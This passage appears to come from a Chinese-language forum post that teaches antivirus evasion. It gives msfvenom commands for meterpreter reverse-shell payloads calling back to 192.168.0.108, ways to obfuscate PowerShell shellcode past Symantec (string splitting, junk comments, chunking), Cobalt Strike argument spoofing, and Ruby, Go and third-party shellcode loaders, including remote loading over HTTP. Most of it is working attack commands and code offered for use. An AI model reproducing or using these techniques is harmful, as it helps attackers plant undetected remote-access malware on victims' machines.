powershell>$s |foreach { $string = $string + $_.ToString()+','}
powershell>$string>c:\1.txt
修改ps脚本
[Byte[]]$var_code = [Byte[]](payload)
再混淆一下函数和变量
绕过执行命令的拦截
使用cs的参数欺骗
beacon > argue cmd.exe blablabla

分块免杀

生成
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.0.108 LPORT=443 -f psh-net -o shity_shellcode.ps1

image

先来测试一下,把ps1文件的shellcode换成一段无害的字符串

image image

结果发现还是被查杀了

image

这表明大多数检测来自PowerShell模板,而不是Shellcode本身。
下面几种bypass方法
1.将字符串分成几部分并创建中间变量;
2.添加大量垃圾备注;
3.添加一些垃圾指令,例如循环或睡眠指令(对于沙盒有用)。
[DllImport("kernel32.dll")]
变为
[DllImport("ke"+"rne"+"l32.dll")] #可绕过赛门铁克
$przdE.ReferencedAssemblies.AddRange(@("System.dll",[PsObject].Assembly.Location))
变为
$magic="Syst"+"em"+".dll";
$przdE.ReferencedAssemblies.AddRange(@($magic,[PsObject].Assembly.Location))
分割shellcode
$sc0=<shellcode的第1部分>; …$sc7=<shellcode的第8部分>; [Byte[]]$tcomplete_sc=[System.Convert]::FromBase64String($sc0+$sc1+…+$sc7)
一些细节可参照
https://raw.githubusercontent.com/kmkz/Pentesting/master/AV_Evasion/AV_Bypass.ps1
我不太懂汇编语言,所以没有添加无害指令。
这里直接使用一键生成的bash脚本,有时间的可以读读里面的命令
https://github.com/darksh3llRU/tools/blob/master/psh-net_shellcode_fastchange.sh
这个脚本是生成个hta的,脚本以1337个字符来分块

image

我测试的时候1337个字符会被赛门铁克查杀到,我这里修改成250个字符来分块

image

因为我没加汇编指令,中间这里直接按任意键跳过即可,懂的可以在开头添加一些指令,例如xor,inc,dec,add,sub,mov,nop等

image

执行完后会生成一些文件

image

我们只用final_pshnet_revhttps.ps1这个文件,打开修改一下

image

修改成

image image image

Ruby

目标机器装有ruby时
生成
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f ruby
粘贴到ruby中

image

执行
>ruby xx.ruby

Golang

生成
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f c
代码转换成0x格式,粘贴到go.txt中保存为go格式

image

安装golang环境在shellcode目录执行
>go build生成exe

加载器

go-shellcode

https://github.com/brimstone/go-shellcode
进入cmd/sc目录编译sc.exe
>go build

image

生成
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f hex -o shell.txt 
加载器加载shellcode
>sc.exe shellcode

image

Gsl

https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/gsl-sc-loader.zip
>gsl -s SHELLCODE -hex msf生成hex格式
>gsl -f shell.raw本地加载raw格式文件
>gsl -f shell.hex -hex 本地加载hex格式文件
>gsl -u http://192.168.0.108/1.raw 远程加载
>gsl -u http://192.168.0.108/1.hex
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now